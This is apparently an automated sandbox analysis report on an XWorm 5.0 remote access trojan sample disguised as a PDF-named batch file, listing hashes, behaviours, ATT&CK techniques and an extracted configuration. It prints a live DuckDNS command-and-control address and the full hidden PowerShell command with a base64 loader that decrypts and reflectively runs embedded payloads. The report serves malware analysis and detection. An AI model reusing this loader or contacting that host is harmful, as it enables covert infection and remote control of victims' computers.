xworm | 9dce073765428a2d48eebf68eda9f67a94d6de41b41daae3a236416a1850b8c1

General

Target

Shipping_Documents.pdf.bat
Size

64KB
MD5

09433b8bcc804eb2d86576f9064a37ef
SHA1

17c9e11369e65e40e621061cde2da11e479d6aa4
SHA256

370fe2362d5ffa4bbcf6dd32cfcfd744809f5ae9c951c6c66950da695f554679
SHA512

d64cc7c3e095507d2ddfa324808b98db01463007ae2c6f6eb4e6523514340ba32d066f9ae1f46019c2a1787625c028bc369cebc3cbb8800650a4205c89ac28f8
SSDEEP

1536:7ZlVZkbmEKUgXEXzICKUnFASrMO2hX47MtDt8TpEn3WK2op7BeX:7ZeHfiSWho7Mg9WMX

Score

10^/10

xworm discovery execution rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

C2

expressblessingnow001.duckdns.org:3911

Mutex

RGibYsdTDFPkg2QK

Attributes

install_file
USB.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral2/memory/4956-21-0x000001FD2FCC0000-0x000001FD2FCD0000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 17 IoCs

flow	pid	Process
30	4956	powershell.exe
38	4956	powershell.exe
39	4956	powershell.exe
63	4956	powershell.exe
64	4956	powershell.exe
65	4956	powershell.exe
70	4956	powershell.exe
72	4956	powershell.exe
73	4956	powershell.exe
74	4956	powershell.exe
79	4956	powershell.exe
80	4956	powershell.exe
81	4956	powershell.exe
82	4956	powershell.exe
83	4956	powershell.exe
85	4956	powershell.exe
88	4956	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4956	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_752fab95.cmd	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_752fab95.cmd	powershell.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4552	cmd.exe
5012	cmd.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
4956	powershell.exe
4956	powershell.exe
4956	powershell.exe
4956	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4956	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4956	powershell.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 5012 wrote to memory of 4552	5012	cmd.exe	86
PID 5012 wrote to memory of 4552	5012	cmd.exe	86
PID 4552 wrote to memory of 4956	4552	cmd.exe	88
PID 4552 wrote to memory of 4956	4552	cmd.exe	88

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Shipping_Documents.pdf.bat"
1⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:5012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\Shipping_Documents.pdf.bat"
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:4552
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskeHR5bWEgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHh0eW1hKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICR4dHltYSIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCR4dHltYSwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkeHR5bWEiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gZWlib24oJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJzZJWTI0T2F6WWQzb0ExeVF0NFZLc0dDVEtUQ1dWVlRWdURGYmhZa0Q4R1U9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJytzSW1Ca3hBZmllR05LbjA3ZDIzWWc9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gcW5kZXAoJHBhcmFtX3Zhcil7CSRlaG5nZj1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkeW9lb2c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkd3F4dHM9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgkZWhuZ2YsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJHdxeHRzLkNvcHlUbygkeW9lb2cpOwkkd3F4dHMuRGlzcG9zZSgpOwkkZWhuZ2YuRGlzcG9zZSgpOwkkeW9lb2cuRGlzcG9zZSgpOwkkeW9lb2cuVG9BcnJheSgpO31mdW5jdGlvbiBpY2RqaygkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJG56b2p6PVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCdbLTEuLi00XSAtam9pbiAnJykoW2J5dGVbXV0kcGFyYW1fdmFyKTsJJGZraW9wPSRuem9qei5FbnRyeVBvaW50OwkkZmtpb3AuSW52b2tlKCRudWxsLCAkcGFyYW0yX3Zhcik7fSRob3N0LlVJLlJhd1VJLldpbmRvd1RpdGxlID0gJHh0eW1hOyR2ZGtycz1bU3lzdGVtLklPLkZpbGVdOjooJ3R4ZVRsbEFkYWVSJ1stMS4uLTExXSAtam9pbiAnJykoJHh0eW1hKS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkenNpIGluICR2ZGtycykgewlpZiAoJHpzaS5TdGFydHNXaXRoKCc6OiAnKSkJewkJJHV5bnZrPSR6c2kuU3Vic3RyaW5nKDMpOwkJYnJlYWs7CX19JHBmd25kPVtzdHJpbmdbXV0kdXludmsuU3BsaXQoJ1wnKTskaWRreGY9cW5kZXAgKGVpYm9uIChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHBmd25kWzBdKSkpOyR1aGxraT1xbmRlcCAoZWlib24gKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkcGZ3bmRbMV0pKSk7aWNkamsgJGlka3hmICRudWxsO2ljZGprICR1aGxraSAoLFtzdHJpbmdbXV0gKCclKicpKTs=')) | Invoke-Expression"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Drops startup file
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:4956

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Network Configuration Discovery

1

T1016

Internet Connection Discovery

1

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1ri2nwdu.vlb.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\dwm.bat

Filesize
64KB

MD5
09433b8bcc804eb2d86576f9064a37ef

SHA1
17c9e11369e65e40e621061cde2da11e479d6aa4

SHA256
370fe2362d5ffa4bbcf6dd32cfcfd744809f5ae9c951c6c66950da695f554679

SHA512
d64cc7c3e095507d2ddfa324808b98db01463007ae2c6f6eb4e6523514340ba32d066f9ae1f46019c2a1787625c028bc369cebc3cbb8800650a4205c89ac28f8

Download Submit
memory/4956-16-0x00007FFD9B940000-0x00007FFD9C401000-memory.dmp

Filesize
10.8MB

Download
memory/4956-13-0x00007FFD9B940000-0x00007FFD9C401000-memory.dmp

Filesize
10.8MB

Download
memory/4956-14-0x00007FFD9B940000-0x00007FFD9C401000-memory.dmp

Filesize
10.8MB

Download
memory/4956-8-0x000001FD2F910000-0x000001FD2F932000-memory.dmp

Filesize
136KB

Download
memory/4956-2-0x00007FFD9B943000-0x00007FFD9B945000-memory.dmp

Filesize
8KB

Download
memory/4956-17-0x00007FFD9B940000-0x00007FFD9C401000-memory.dmp

Filesize
10.8MB

Download
memory/4956-19-0x000001FD2F8E0000-0x000001FD2F8EE000-memory.dmp

Filesize
56KB

Download
memory/4956-18-0x000001FD155A0000-0x000001FD155A8000-memory.dmp

Filesize
32KB

Download
memory/4956-21-0x000001FD2FCC0000-0x000001FD2FCD0000-memory.dmp

Filesize
64KB

Download
memory/4956-22-0x00007FFD9B943000-0x00007FFD9B945000-memory.dmp

Filesize
8KB

Download
memory/4956-23-0x00007FFD9B940000-0x00007FFD9C401000-memory.dmp

Filesize
10.8MB

Download
memory/4956-24-0x00007FFD9B940000-0x00007FFD9C401000-memory.dmp

Filesize
10.8MB

Download
memory/4956-25-0x00007FFD9B940000-0x00007FFD9C401000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing